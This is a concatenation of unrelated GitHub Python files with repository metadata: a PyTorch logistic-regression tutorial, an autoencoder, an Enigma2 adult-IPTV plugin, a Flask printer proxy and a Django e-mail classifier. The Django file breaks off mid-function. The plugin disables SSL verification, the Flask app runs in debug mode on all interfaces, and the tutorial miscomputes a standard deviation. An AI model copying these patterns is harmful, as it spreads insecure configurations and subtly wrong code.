activision_user_string_list, cold_war_flag=True
)
assert stats == stat_list
| cesaregarza/Nerdtracker_Client | nerdtracker_client/tests/test_scraper.py | test_scraper.py | py | 2,972 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nerdtracker_client.scraper.create_scraper",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "nerdtracker_client.scraper.retrieve_page_from_tracker",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "pytest.mark",
"line_number": 15,
"usage_t... |
36532411991 | #The code base on https://github.com/zergtant/pytorch-handbook
import torch # pytorch 实现
import torch.nn as nn
import numpy as np #处理矩阵运算
'''
1 logistic回归会在线性回归后再加一层logistic函数的调用,主要
用于二分类预测
2 使用UCI German Credit 数据集
german.data-numeric 是已经使用numpy 处理好的数值化数据,
可以直接numpy 调用
'''
# 第一步:读取数据
data=np.loadtxt("german.data-numeric") #将数据放到文件中加载
#第二步:对数据做归一化处理
n,l=data.shape #shape 返回矩阵大小
for i in range(l-1): #按列索引
meanVal=np.mean(data[:,i]) #求均值 [:,i] 取所有行第i列所有值
stdVal=np.std(data[:i]) # 标准差
data[:,i]=(data[:,i]-meanVal)/stdVal
#打乱数据
np.random.shuffle(data)
'''
第三步:区分数据集和测试集:
区分规则:900条用于训练,100条用于测试
前24列为24个维度,最后一个要打的标签(0,1)
'''
train_data=data[:900,:l-1]
train_lab=data[:900,l-1]-1
test_data=data[900:,:l-1]
test_lab=data[900:,l-1]-1
#第四步 定义模型
class Logistic_Regression(nn.Module):
#初始化模型
def __init__(self):
# super(Logistic_Regression,self) 首先找到 Logistic_Regression的父类(就是类nn.Module)
# 然后把类 Logistic_Regression的对象转换为类 nn.Module的对象
super(Logistic_Regression,self).__init__()
self.fc=nn.Linear(24,2) # 输入通道为24,输出通道为2
#前向传播
def forward(self,x):
out=self.fc(x)
out=torch.sigmoid(out) # sigmoid 激活
return out
#测试集上的准确率
def test(pred,lab):
t=pred.max(-1)[1]==lab
return torch.mean(t.float())
#第五步:设置超参数和优化
net=Logistic_Regression()
criterion=nn.CrossEntropyLoss() #定义损失函数
optm=torch.optim.Adam(net.parameters()) #利用Adam 进行优化
epochs=1100#训练次数
#第六步:开始训练
for i in range(epochs):
#指定模型为训练模式,计算梯度
net.train()
#将numpy 输入转换为torch的Tensor
x=torch.from_numpy(train_data).float()
y=torch.from_numpy(train_lab).long()
y_hat=net(x) #x 为训练数据
loss=criterion(y_hat,y) #计算损失
optm.zero_grad() #前一步损失清零
loss.backward() #f=反向传播
optm.step() #优化
if (i+1)%100==0: #每一百100输出相关信息
net.eval()
test_in=torch.from_numpy(test_data).float()
test_l=torch.from_numpy(test_lab).long()
test_out=net(test_in)
accu=test(test_out,test_l)
print("Epoch:{},Loss:{:.4f},Accuracy:{:.2f}".format(i+1,loss.item(),accu))
| BrandonHoo/Deep-Learning-Practice-Project | Logistic_Regression_practice.py | Logistic_Regression_practice.py | py | 2,774 | python | zh | code | 1 | github-code | 36 | [
{
"api_name": "numpy.loadtxt",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "numpy.std",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "numpy.random.shuffle",
"line_n... |
14007726581 | import torch
import torch.nn as nn
import os
from torchvision import datasets, transforms
from torch.utils.data import DataLoader, Dataset
import wandb
from PIL import Image
import numpy as np
from tqdm import tqdm
from torch.optim.lr_scheduler import ExponentialLR
class Encoder(nn.Module):
def __init__(self, encoded_space_dim):
super().__init__()
### Convolutional section
self.encoder_cnn = nn.Sequential(
nn.Conv2d(in_channels = 3, out_channels = 8, kernel_size = 9, stride=2, padding=2),
nn.ReLU(True),
nn.Conv2d(in_channels = 8, out_channels = 16, kernel_size = 9, stride=2, padding=2),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.Conv2d(in_channels = 16, out_channels = 32, kernel_size = 9, stride=2, padding=2),
nn.BatchNorm2d(32),
nn.ReLU(True),
nn.Conv2d(in_channels = 32, out_channels = 64, kernel_size = 9, stride=2, padding=1),
nn.ReLU(True),
)
### Flatten layer
self.flatten = nn.Flatten(start_dim=1)
### Linear section
self.encoder_lin = nn.Sequential(
nn.Linear(8 * 8 * 64, encoded_space_dim),
nn.ReLU(True),
)
def forward(self, x):
x = self.encoder_cnn(x)
x = self.flatten(x)
x = self.encoder_lin(x)
return x
class Decoder(nn.Module):
def __init__(self, encoded_space_dim):
super().__init__()
self.decoder_lin = nn.Sequential(
nn.Linear(encoded_space_dim, 8 * 8 * 64),
nn.ReLU(True)
)
self.unflatten = nn.Unflatten(dim=1,
unflattened_size=(64, 8, 8))
self.decoder_conv = nn.Sequential(
nn.ConvTranspose2d(in_channels = 64, out_channels = 32, kernel_size = 9, stride=2, padding = 1, output_padding= 1,),
nn.BatchNorm2d(32),
nn.ReLU(True),
nn.ConvTranspose2d(in_channels = 32, out_channels = 16, kernel_size = 9, stride=2, padding = 2, output_padding = 1),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.ConvTranspose2d(in_channels = 16, out_channels = 8, kernel_size = 9, stride=2, padding = 3, output_padding = 1),
nn.BatchNorm2d(8),
nn.ReLU(True),
nn.ConvTranspose2d(in_channels = 8, out_channels = 3, kernel_size = 9, stride=2, padding = 2, output_padding = 1),
)
self.post_net =nn.Sequential(
nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5, padding=2),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.Conv2d(in_channels=16, out_channels=8, kernel_size=5, padding=2),
nn.BatchNorm2d(8),
nn.ReLU(True),
nn.Conv2d(in_channels=8, out_channels=3, kernel_size=5, padding=2),
)
def forward(self, x):
x = self.decoder_lin(x)
x = self.unflatten(x)
x = self.decoder_conv(x)
x = torch.sigmoid(x)
y = self.post_net(x)
y = torch.sigmoid(x + y)
return x, y
def train(encoder, decoder, train_loader, device = 'cpu', logger = None):
optimizer = torch.optim.Adam(list(encoder.parameters()) + list(decoder.parameters()), lr=0.0001, weight_decay=1e-05)
scheduler = ExponentialLR(optimizer, gamma=0.9)
loss_func = nn.MSELoss()
encoder.to(device).train()
decoder.to(device).train()
for epoch in range(100):
for step, x in enumerate(train_loader):
x = torch.tensor(x.clone() , dtype = torch.float32, device = device) / 255.0
pre_out, post_out = decoder(encoder(x))
loss = 0.8 * loss_func(pre_out, x) + loss_func(post_out, x)
optimizer.zero_grad()
loss.backward()
optimizer.step()
logger.log({'Loss': loss.cpu().item()})
input = wandb.Image(x[0].cpu().detach().numpy().reshape(200,200,3))
output = wandb.Image(post_out[0].cpu().detach().numpy().reshape(200,200,3))
logger.log({"Input": input,
"Output": output})
scheduler.step()
class UTKFaceDataset(Dataset):
def __init__(self, test_size = .2, data_type = "train"):
"""
Create data loader for UTKFace dataset
"""
self.data_dir = 'data/UTKFace/'
self.all_files = os.listdir(self.data_dir)
if data_type == "train":
self.data = []
for file in tqdm(self.all_files[:]):
img = Image.open(self.data_dir + file)
self.data.append(np.asanyarray(img).reshape(3,200,200))
img.close()
self.X = torch.tensor(np.stack(self.data))
def get_data(self):
return self.X.shape, self.y.shape
def __len__(self):
return self.X.shape[0]
def __getitem__(self, idx):
img = self.X[idx]
return img
if __name__ == '__main__':
dim = 256
# torch.manual_seed(1000)
dataset = UTKFaceDataset()
# train_loader = DataLoader(datasets, batch_size=32, shuffle=True)
# logger = wandb.init(project="autoencoder", name=f"AE {dim} TEST", entity='petergroenning')
encoder_weights = torch.load('models/encoder_256.pt', map_location=torch.device('cpu'))
decoder_weights = torch.load('models/decoder_256.pt', map_location=torch.device('cpu'))
encoder = Encoder(encoded_space_dim=dim)
decoder = Decoder(encoded_space_dim=dim)
encoder.load_state_dict(encoder_weights)
decoder.load_state_dict(decoder_weights)
encoder.eval()
decoder.eval()
print(dataset.X.shape)
# decoder = Decoder(encoded_space_dim=dim, fc2_input_dim=512)
# torch.manual_seed(1000)
# train(encoder, decoder, train_loader, device = 'cuda', logger = logger)
# torch.save(encoder.state_dict(), f"encoder_{dim}.pth")
# torch.save(decoder.state_dict(), f"decoder{dim}.pth")
| s183920/02582_Computational_Data_Analysis_Case2 | autoencoder.py | autoencoder.py | py | 6,011 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"lin... |
25127011115 | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
****************************************
* coded by Lululla & PCD *
* skin by MMark *
* 26/03/2023 *
* Skin by MMark *
****************************************
# --------------------#
# Info http://t.me/tivustream
'''
from __future__ import print_function
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Pixmap import Pixmap
from Screens.Screen import Screen
from Tools.Directories import SCOPE_PLUGINS
from Tools.Directories import resolveFilename
from enigma import eTimer
import codecs
import os
import re
import six
import ssl
import sys
from Plugins.Extensions.xxxplugin.plugin import rvList, Playstream1
from Plugins.Extensions.xxxplugin.plugin import show_
from Plugins.Extensions.xxxplugin.lib import Utils
from Plugins.Extensions.xxxplugin import _, skin_path
PY3 = sys.version_info.major >= 3
print('Py3: ', PY3)
if sys.version_info >= (2, 7, 9):
try:
sslContext = ssl._create_unverified_context()
except:
sslContext = None
currversion = '1.0'
title_plug = 'freearhey '
desc_plugin = ('..:: freearhey by Lululla %s ::.. ' % currversion)
PLUGIN_PATH = resolveFilename(SCOPE_PLUGINS, "Extensions/{}".format('xxxplugin'))
current = os.path.dirname(os.path.realpath(__file__))
parent = os.path.dirname(current)
sys.path.append(parent)
print(current)
print(parent)
pluglogo = os.path.join(PLUGIN_PATH, 'pic/freearhey.png')
stripurl = 'aHR0cHM6Ly9pcHR2LW9yZy5naXRodWIuaW8vaXB0di9jYXRlZ29yaWVzL3h4eC5tM3U='
referer = 'https://github.com/iptv-org/iptv'
_session = None
Path_Movies = '/tmp/'
PY3 = sys.version_info.major >= 3
class main(Screen):
    """Channel-list screen: downloads the m3u playlist, shows the parsed
    channels in a list, and plays the selected stream."""

    def __init__(self, session):
        self.session = session
        Screen.__init__(self, session)
        # Load the shared skin XML for a default list screen.
        skin = os.path.join(skin_path, 'defaultListScreen.xml')
        with codecs.open(skin, "r", encoding="utf-8") as f:
            self.skin = f.read()
        self.menulist = []
        self['menulist'] = rvList([])
        self['red'] = Label(_('Back'))
        # self['green'] = Label(_('Export'))
        self['title'] = Label('')
        self['title'].setText(title_plug)
        self['name'] = Label('')
        self['text'] = Label('Only for Adult by Lululla')
        self['poster'] = Pixmap()
        self.currentList = 'menulist'
        self['actions'] = ActionMap(['OkCancelActions',
                                     'ColorActions',
                                     'DirectionActions',
                                     'MovieSelectionActions'], {'up': self.up,
                                                                'down': self.down,
                                                                'left': self.left,
                                                                'right': self.right,
                                                                'ok': self.ok,
                                                                'green': self.ok,
                                                                'cancel': self.exit,
                                                                'red': self.exit}, -1)
        # Populate the list shortly after the screen opens; DreamOS images
        # use a different timer-connection API than other enigma2 images.
        self.timer = eTimer()
        if Utils.DreamOS():
            self.timer_conn = self.timer.timeout.connect(self.updateMenuList)
        else:
            self.timer.callback.append(self.updateMenuList)
        self.timer.start(500, True)

    def _refresh_name(self):
        """Show the title of the currently highlighted entry.

        This was duplicated verbatim in up/down/left/right; it also guards
        against an empty list (getCurrent() returning None), which used to
        raise TypeError while the playlist was still loading.
        """
        current = self['menulist'].getCurrent()
        if current:
            self['name'].setText(str(current[0][0]))

    def up(self):
        self[self.currentList].up()
        self._refresh_name()

    def down(self):
        self[self.currentList].down()
        self._refresh_name()

    def left(self):
        self[self.currentList].pageUp()
        self._refresh_name()

    def right(self):
        self[self.currentList].pageDown()
        self._refresh_name()

    def updateMenuList(self):
        """Download the playlist, parse the channel entries and fill the list."""
        # (The original also looped deleting from the list it had just
        # reset to [] — dead code, removed.)
        self.cat_list = []
        items = []
        try:
            url = Utils.b64decoder(stripurl)
            content = Utils.getUrl2(url, referer)
            if six.PY3:
                content = six.ensure_str(content)
            regexcat = '#EXTINF.*?title="(.+?)".*?,(.+?)\\n(.+?)\\n'
            match = re.compile(regexcat, re.DOTALL).findall(content)
            for country, name, url in match:
                # Only keep HLS streams.
                if ".m3u8" not in url:
                    continue
                url = url.replace(" ", "").replace("\\n", "").replace('\r', '')
                name = name.replace('\r', '')
                name = country + ' | ' + name
                item = name + "###" + url + '\n'
                items.append(item)
            items.sort()
            for item in items:
                name = item.split('###')[0]
                url = item.split('###')[1]
                name = name.capitalize()
                self.cat_list.append(show_(name, url))
            self['menulist'].l.setList(self.cat_list)
            self._refresh_name()
        except Exception as e:
            print('exception error ', str(e))

    def ok(self):
        """Play the highlighted channel."""
        name = self['menulist'].getCurrent()[0][0]
        url = self['menulist'].getCurrent()[0][1]
        self.play_that_shit(url, name)

    def play_that_shit(self, url, name):
        """Open the player screen on the given stream url."""
        self.session.open(Playstream1, str(name), str(url))

    def exit(self):
        self.close()
| Belfagor2005/xxxplugin | usr/lib/enigma2/python/Plugins/Extensions/xxxplugin/Sites/freearhey.py | freearhey.py | py | 5,713 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.version_info",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "sys.version_info",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "ssl._create_unverified_context",
"line_number": 37,
"usage_type": "call"
},
{
"api_na... |
40290054155 | from flask import Flask, request, jsonify
from flask_cors import CORS
import re
from escpos.printer import Network
import base64
import os
app = Flask(__name__)
CORS(app)
@app.route('/text/<addr>', methods=['GET', 'POST'])
def print_text(addr):
    """Print the request body as plain text on the printer at *addr*, then cut."""
    payload, device, error = setup_for_command(request, addr)
    if error:
        return error
    device.text(payload)
    cut(printer=device)
    return jsonify(message="Success!", code=200)
@app.route('/block/<addr>', methods=['GET', 'POST'])
def print_block(addr):
    """Print the request body as block text on the printer at *addr*, then cut."""
    payload, device, error = setup_for_command(request, addr)
    if error:
        return error
    device.block_text(payload)
    cut(printer=device)
    return jsonify(message="Success!", code=200)
@app.route('/img/<addr>', methods=['GET', 'POST'])
def print_img(addr):
    """Decode the base64 image in the request body and print it at *addr*."""
    image_path, device, error = setup_for_command(request, addr, data_type="img")
    if error:
        return error
    device.image(image_path)
    cut(printer=device)
    return jsonify(message="Success!", code=200)
@app.route('/status/<addr>', methods=['GET'])
def print_status(addr):
    """Probe the printer at *addr*; success means it accepted a cut command."""
    try:
        cut(addr=addr, request=request)
        return jsonify(message="Success!", code=200)
    except Exception:  # was a bare except, which would also swallow SystemExit
        return jsonify(message="Error!", code=500)
@app.route('/cut/<addr>', methods=['GET'])
def print_cut(addr):
    """Cut the paper on the printer at *addr* without printing anything."""
    return cut(addr=addr, request=request)
def cut(printer=False, addr=False, request=False):
    """Cut the paper, either on an already-open *printer* or by opening
    a connection to *addr* using *request*.

    Bug fix: the error response from setup_for_command() was previously
    ignored, so a failed setup left printer == False and the subsequent
    printer.cut() raised AttributeError (HTTP 500) — notably on every
    GET /cut, where setup_for_command() itself performs the probe cut
    and returns only a message.
    """
    if printer:
        return printer.cut()
    data, printer, message = setup_for_command(request, addr)
    if message:
        # Setup already handled (or failed) the request; propagate its response.
        return message
    printer.cut()
    return jsonify(message="Success!", code=200)
def setup_for_post_command(request, addr, data_type="txt"):
    """Run setup_for_command(), rejecting any non-POST request with a 405."""
    if request.method != 'POST':
        return False, False, jsonify(message="This should be used with POST method.", code=405)
    return setup_for_command(request, addr, data_type)


def setup_for_get_command(request, addr, data_type="txt"):
    """Run setup_for_command(), rejecting any non-GET request with a 405.

    Bug fix: this was also named ``setup_for_post_command``, silently
    shadowing the POST variant above; renamed to match its method check.
    (Neither helper is called elsewhere in this file.)
    """
    if request.method != 'GET':
        return False, False, jsonify(message="This should be used with GET method.", code=405)
    return setup_for_command(request, addr, data_type)
def setup_for_command(request, addr, data_type="txt"):
    """Validate *addr*, decode the request payload and open the printer.

    Returns a ``(data, printer, error_response)`` triple: on success,
    ``data`` and ``printer`` are set and ``error_response`` is False; on
    any failure (or on an empty payload, which is treated as a
    connectivity probe) the first two are False and the third carries a
    flask response.
    """
    if not validate_address(addr):
        return False, False, jsonify(message="Not a valid url or ip address.", code=406)
    data = get_data(request.data, data_type)
    printer = create_network(addr)
    if not printer:
        return False, False, jsonify(message="Error ocurred", code=504)
    app.logger.info(data or "no data")
    if printer and not data:
        # Empty payload: a successful cut proves the printer is reachable.
        try:
            printer.cut()
        except Exception:  # was a bare except; keep the same best-effort intent
            return False, False, jsonify(message="No connection could be made to the address.", code=406)
        return False, False, jsonify(message="Printer found on ip: %s" % addr, code=202)
    return data, printer, False
def get_data(data, data_type):
    """Decode the raw request body.

    For data_type == "txt" the body is returned as a UTF-8 string.
    Otherwise the body is assumed to be base64-encoded image data, is
    written to ``temp_receipt.jpg`` next to this module, and that file
    path is returned. Returns False when decoding or writing fails.
    """
    try:
        if data_type == "txt":
            return str(data.decode('utf-8'))
        app.logger.info(data)
        imgdata = base64.b64decode(data)
        dir_path = os.path.dirname(os.path.realpath(__file__))
        filename = dir_path + "/temp_receipt.jpg"
        with open(filename, 'wb') as f:
            app.logger.info(filename)
            f.write(imgdata)
        return filename
    except Exception:  # was a bare except; still deliberately best-effort
        return False
def create_network(addr):
    """Open a network connection to the ESC/POS printer at *addr*.

    Returns the Network object, or False when the connection times out.
    """
    try:
        return Network(addr)
    except TimeoutError:
        return False
def validate_address(addr):
    """Return a match object when *addr* looks like a host — a dotted
    domain, ``localhost`` or a dotted IPv4 address, with an optional
    port and path — otherwise None."""
    addr_re = re.compile(
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'  # domain...
        r'localhost|'  # localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'  # ...or ip
        r'(?::\d+)?'  # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    return addr_re.match(addr)
if __name__ == '__main__':
app.run(debug=True, host="0.0.0.0") | Christophersuazop/printer_proxy | main.py | main.py | py | 3,827 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "flask.request",
"line_number": 15,
"usage_type": "argument"
},
{
"api_name": "flask.jsonify",
"lin... |
71504143463 | from django.shortcuts import render
from django.http import HttpResponse
from zipfile import ZipFile, is_zipfile, Path
import os
from outlook_msg import Message
import pandas as pd
import numpy as np
import re
import nltk
import spacy
from string import punctuation
import extract_msg
nltk.download('punkt')
from nltk.tokenize import word_tokenize
# NLTK stopwords modules
nltk.download('stopwords')
from nltk.corpus import stopwords
# NLTK lemmatization modules
nltk.download('wordnet')
from nltk.stem import WordNetLemmatizer
import io
import matplotlib.pyplot as plt
import sklearn
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
import pickle
import numpy as np
import pandas as pd
from keras import backend as K
from keras.layers.experimental.preprocessing import TextVectorization
from keras.preprocessing.text import one_hot,Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Reshape,RepeatVector,LSTM,Dense,Flatten,Bidirectional,Embedding,Input,Layer,GRU,Multiply,Activation,Lambda,Dot,TimeDistributed,Dropout,Embedding
from keras.models import Model
from keras.activations import softmax,selu,sigmoid
from keras.optimizers import Adam
from keras.initializers import glorot_uniform
from keras.regularizers import l2
from keras.constraints import min_max_norm
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import plot_model
import tensorflow as tf
import os
import gensim
from tqdm import tqdm
import keras
from .attention_with_context import *
from .sentence_encoder import *
from .word_encoder import *
########### GLOBALS ##################################
tfidf = None
category_filename = "category.pkl"
test_filelist_filename = "test_filenames.pkl"
tfidf_file = 'tfidf_file.pkl'
########## VIEWS ##################################
# Create your views here.
def index1(request):
    """Render the deep-learning home page with the train flag off.

    The original branched on GET vs POST but rendered the identical
    context either way, and implicitly returned None for any other HTTP
    method (which Django treats as an error); collapsed to one return.
    The commented-out model-loading scaffold was dead code and removed.
    """
    return render(request, 'home.html', {'train_success': False})
def submit_data(request):
    """Accept a POSTed zip of Outlook .msg files grouped into one folder
    per category, extract them, build a (Category, Subject, Body) CSV,
    run the preprocessing pipeline, and return the raw CSV inline.
    """
    if request.method == 'GET':
        return HttpResponse("<h1>FORBIDDEN!</h1> <h2>This Page Cannot Be Accessed Directly.</h2>")
    elif request.method == 'POST':
        print("For debug")
        print(request.FILES)
        file = request.FILES['train']
        if is_zipfile(file) is False:
            return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload A Zip File Containing The DataSet</h2>")
        # Stores the categories obtained
        cats = []
        # Extract the files to a new directory named by the input folder name
        file_path = ""
        with ZipFile(file,'r') as myzip:
            path = Path(myzip)
            # print(path.name)
            # each top-level folder inside the zip is one category label
            for dir in path.iterdir():
                cats.append(dir.name)
            file_path = os.getcwd() + os.path.sep + myzip.filename.split('.')[0]
            print(file_path)
            myzip.extractall(path=file_path)
        # save the category file to disk, so that can be retrieved while testing
        open_file = open(category_filename,'wb')
        pickle.dump(cats,open_file)
        open_file.close()
        # Now the Zip file has been extracted to the working directory and file_path is the absolute path of the folder
        data = []
        for cat in cats:
            sub_path = file_path + os.path.sep + cat
            for root,directories,files in os.walk(sub_path):
                for file in files:
                    abs_path = os.path.join(root,file)
                    # with extract_msg.Message(abs_path) as msg:
                    # NOTE(review): the .msg file is opened in *text* mode
                    # here — confirm outlook_msg accepts that on all OSes.
                    with open(abs_path) as msg_file:
                        msg = Message(msg_file)
                        # Quote subject/body so embedded commas survive the CSV.
                        sub = "\""+msg.subject+"\""
                        body = "\""+msg.body+"\""
                        temp = [cat, sub, body]
                        data.append(temp)
        df = pd.DataFrame(data,columns=['Category', 'Subject', 'Body'])
        csv_path = file_path+'.csv'
        df.to_csv(csv_path, index=False, header=True)
        preprocess(csv_path=csv_path)
        with open(csv_path, 'rb') as fh:
            response = HttpResponse(fh.read(), content_type="text/csv")
            response['Content-Disposition'] = 'inline; filename=' + os.path.basename(csv_path)
            return response
    # NOTE(review): unreachable — both method branches above return first.
    return HttpResponse("DONE")
def index2(request):
    """Render the machine-learning home page, flagging whether a trained
    model file already exists on disk.

    Bug fix: the original opened 'Train_AI_Model' purely to test its
    existence and never closed the handle (a resource leak); it also
    implicitly returned None for HTTP methods other than GET/POST.
    """
    trained = os.path.exists('Train_AI_Model')
    return render(request, 'home2.html', {'train_success': trained})
##### FUNCTION TO PREPROCESS DATA #############################
def remove_emails_urls(dataframe):
    """Strip e-mail addresses (plus one trailing space) and then URLs."""
    cleaned = re.sub(r'\S*@\S*\s?', '', str(dataframe))
    return re.sub(r"http\S+", '', cleaned)
def remove_dates(dataframe):
    """Blank out numeric dates, month names and weekday names, in that order."""
    date_patterns = (
        # DD/MM/YYYY or MM/DD/YYYY or DD|MM.MM|DD.YYYY format
        r'(\b(0?[1-9]|[12]\d|30|31)[^\w\d\r\n:](0?[1-9]|1[0-2])[^\w\d\r\n:](\d{4}|\d{2})\b)|(\b(0?[1-9]|1[0-2])[^\w\d\r\n:](0?[1-9]|[12]\d|30|31)[^\w\d\r\n:](\d{4}|\d{2})\b)',
        # October 21, 2014 format
        r'\b(?:jan(?:uary)?|feb(?:ruary)?|mar(?:ch)?|apr(?:il)?|may|jun(?:e)?|jul(?:y)?|aug(?:ust)?|sep(?:tember)?|oct(?:ober)?|(nov|dec)(?:ember)?)(?=\D|$)',
        # mon|monday format
        r'\b((mon|tues|wed(nes)?|thur(s)?|fri|sat(ur)?|sun)(day)?)\b',
    )
    for pattern in date_patterns:
        dataframe = re.sub(pattern, '', dataframe)
    return dataframe
def remove_useless(dataframe):
    """Drop boilerplate e-mail header tokens (body headers first, then
    subject prefixes), preserving the original removal order."""
    for token in ('from:', 'sent:', 'to:', 'cc:', 'bcc:', 'subject:',
                  'message encrypted', 'warning:',
                  'fw:', 're:'):
        dataframe = re.sub(token, '', dataframe)
    return dataframe
def remove_punctuation(text):
    """Delete every character that is neither a word character nor whitespace."""
    punct = re.compile('[^\w\s]')
    return punct.sub('', text)
def remove_no(text):
    """Strip every run of digits from *text*."""
    digits = re.compile(r"\d+")
    return digits.sub('', text)
def remove_of_words(text):
    """Normalise underscore-decorated words: _w_/_w/w_ -> w, w1_w2 -> w1 w2."""
    # NOTE: [a-zA-z] (capital Z missing) is kept as-is to preserve behavior.
    rules = (
        (r"\b_([a-zA-z]+)_\b", r"\1"),              # _word_ -> word
        (r"\b_([a-zA-z]+)\b", r"\1"),               # _word  -> word
        (r"\b([a-zA-z]+)_\b", r"\1"),               # word_  -> word
        (r"\b([a-zA-Z]+)_([a-zA-Z]+)\b", r"\1 \2"),  # word1_word2 -> word1 word2
    )
    for pattern, repl in rules:
        text = re.sub(pattern, repl, text)
    return text
def remove_less_two(text):
    """Drop whole words of three characters or fewer (despite the name)."""
    short_word = re.compile(r'\b\w{1,3}\b')
    return short_word.sub("", text)
def remove_char(dataframe):
    """Collapse whitespace runs to single spaces, trim both ends, and
    remove a 28-underscore separator rule."""
    for pattern, repl in ((r"\s+", ' '),
                          (r"^\s+|\s+$", ""),
                          (r"\b____________________________\b", '')):
        dataframe = re.sub(pattern, repl, dataframe)
    return dataframe
def remove_stopwords(text):
    """Remove English stopwords plus common greeting words from *text*,
    returning the surviving tokens joined with single spaces."""
    greeting_words = ['hello', 'good', 'morning', 'evening', 'afternoon',
                      'respected', 'dear', 'madam', 'sincerely',
                      'regards', 'truly']
    drop_list = stopwords.words('english')
    drop_list.extend(greeting_words)
    kept = [tok for tok in word_tokenize(text) if tok not in drop_list]
    return ' '.join(kept)
def lemmatized(text):
    """Lemmatise every token of *text* with WordNet and rejoin with spaces."""
    wnl = nltk.stem.WordNetLemmatizer()
    return ' '.join(wnl.lemmatize(tok) for tok in word_tokenize(text))
def preprocess(csv_path, test=False):
    """Run the full text-cleaning pipeline over the raw e-mail CSV.

    Lower-cases Subject/Body, applies every cleaning helper to both
    columns in the original order, adds lemmatised variants, and saves
    the result as Pre_Test.csv (test=True) or Pre_Train.csv.
    """
    df = pd.read_csv(csv_path)
    # Lower Text Case
    df[['Subject', 'Body']] = df[['Subject', 'Body']].apply(lambda x: x.str.lower())
    # Regex cleanups, then NLP-based stopword removal — same order as before.
    cleaning_steps = (
        remove_emails_urls,   # e-mails and URLs
        remove_dates,         # numeric dates, months, weekdays
        remove_useless,       # header/prefix boilerplate
        remove_punctuation,
        remove_no,            # digits
        remove_of_words,      # underscore-decorated words
        remove_less_two,      # short words (<4 chars)
        remove_char,          # whitespace normalisation
        remove_stopwords,
    )
    for step in cleaning_steps:
        for column in ('Subject', 'Body'):
            df[column] = df[column].apply(step)
    # Lemmatization
    df['Lemma Subject'] = df['Subject'].apply(lemmatized)
    df['Lemma Body'] = df['Body'].apply(lemmatized)
    # Saving of Preprocessed Data
    out_name = 'Pre_Test.csv' if test else 'Pre_Train.csv'
    df.to_csv(out_name, index=False)
############ MACHINE LEARNING TRAINING FUNCTION #######################################
def trainml(request):
    """Fit a TF-IDF + RandomForest classifier on the preprocessed train
    CSV and persist both the vectoriser and the model to disk."""
    try:
        data = pd.read_csv("Pre_Train.csv", encoding='utf-8')
    except:
        return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload the Train Dataset first</h2>")
    else:
        # data['Category_Id'] = data['Category'].factorize()[0]
        #
        # data['Lemma Message'] = data['Lemma Subject'].astype(str) + " " + data['Lemma Body'].astype(str)
        # NOTE(review): this expects 'Category_id' and 'LemmaConcatenated'
        # columns, but preprocess() emits 'Lemma Subject'/'Lemma Body' and
        # no Category_id — confirm where these columns are produced.
        df = data[['Category_id', 'LemmaConcatenated']]
        category_id_df = data[['Category', 'Category_id']].drop_duplicates().sort_values('Category_id')
        """**Text Vectorization**"""
        # Module-level vectoriser is reused (and also pickled) for testml().
        global tfidf
        tfidf = TfidfVectorizer(sublinear_tf=True, min_df=5, norm='l2', encoding='latin-1', ngram_range=(1, 2),
                                stop_words='english')
        features = tfidf.fit_transform(df['LemmaConcatenated']).toarray()
        # save the tfidf model
        open_file = open(tfidf_file,'wb')
        pickle.dump(tfidf,open_file)
        open_file.close()
        # continue with everything
        labels = df.Category_id
        """**Train the Model**"""
        # NOTE(review): bootstrap='False' is the *string* 'False', not the
        # boolean — sklearn may treat it as truthy; confirm intent.
        model = RandomForestClassifier(random_state=0, n_estimators=200, min_samples_split=2, min_samples_leaf=1,
                                       max_features='auto', max_depth=105, bootstrap='False')
        # Split the Data
        X_train = features
        y_train = labels
        # Train the Algorithm
        train_model = model.fit(X_train, y_train)
        """**Save the Model**"""
        pickle.dump(train_model, open('Train_AI_Model', 'wb'))
        return render(request, 'home2.html', {'train_success' : True})
#################################################################### DEEP LEARNING TRAIN FUNCTION #######################################
def dot_product(x, kernel):
    """Backend-agnostic dot product of *x* with weight vector *kernel*.

    TensorFlow needs the kernel expanded to a column and the result
    squeezed back; Theano's K.dot handles the shapes directly.
    """
    if K.backend() != 'tensorflow':
        return K.dot(x, kernel)
    return K.squeeze(K.dot(x, K.expand_dims(kernel)), axis=-1)
def emb_loss(model, X, Y, training):
    """Categorical cross-entropy between targets *Y* and model(X).

    training=training is needed only if there are layers with different
    behavior during training versus inference (e.g. Dropout).
    """
    predictions = model(X, training=training)
    cce = tf.keras.losses.CategoricalCrossentropy()
    return cce(Y, predictions)
def grad_emb(model, inputs, targets):
